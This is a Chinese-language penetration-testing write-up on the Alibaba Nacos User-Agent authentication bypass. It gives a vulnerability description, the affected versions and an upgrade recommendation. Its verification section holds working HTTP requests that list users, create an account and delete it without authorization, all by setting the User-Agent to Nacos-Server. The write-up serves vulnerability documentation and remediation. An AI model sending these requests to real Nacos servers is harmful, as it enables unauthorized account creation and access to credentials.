前言
持续更新:整理下渗透测试工作中发现过的漏洞(包含漏洞描述、漏洞等级、漏洞验证、修复建议),这里不深究漏洞产生的各种后利用或者绕过方式,漏洞验证过程不局限于文章中的方法,能够证明漏洞存在即可。
0x01 漏洞描述
- Alibaba Nacos 权限认证绕过 -
Alibaba Nacos是阿里巴巴推出来的一个新开源项目,是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos提供了一组简单易用的特性集,可以快速实现动态服务发现、服务配置、服务元数据及流量管理。
该漏洞发生在Nacos在进行认证授权操作时,会判断请求的user-agent是否为”Nacos-Server”,如果是的话则不进行任何认证。开发者原意是用来处理一些服务端对服务端的请求。但是由于配置的过于简单,并且将协商好的user-agent设置为Nacos-Server,直接硬编码在了代码里,导致了漏洞的出现。并且利用这个未授权漏洞,攻击者可以获取到用户名密码等敏感信息。
- 影响版本: Alibaba Nacos <= 2.0.0-ALPHA.1
0x02 漏洞等级
威胁级别 | 高危 | 中危 | 低危 |
|---|
0x03 漏洞验证
访问Nacos系统界面,使用BurpSuite工具抓取数据包。
修改请求包中的User-Agent的值为Nacos-Server,再访问/nacos/v1/auth/users?pageNo=1&pageSize=9可以获取已有的用户列表。
GET /nacos/v1/auth/users?pageNo=1&pageSize=9 HTTP/1.1
Host: www.luckysec.cn:8848
User-Agent: Nacos-Server
使用POST方式访问/nacos/v1/auth/users新建一个新账号luckysec
POST /nacos/v1/auth/users HTTP/1.1
Host: www.luckysec.cn:8848
User-Agent: Nacos-Server
Content-Type: application/x-www-form-urlencoded
Content-Length: 33
username=luckysec&password=123456
返回登录界面,使用新建的账号登录成功。
漏洞验证完成后,可以访问/nacos/v1/auth/users?username=luckysec,将HTTP方法改为DELETE,即可未授权删除刚刚创建的账号luckysec。
DELETE /nacos/v1/auth/users?username=luckysec HTTP/1.1
Host: www.luckysec.cn:8848
User-Agent: Nacos-Server
0x04 漏洞修复
- 升级Nacos版本至最新版本。
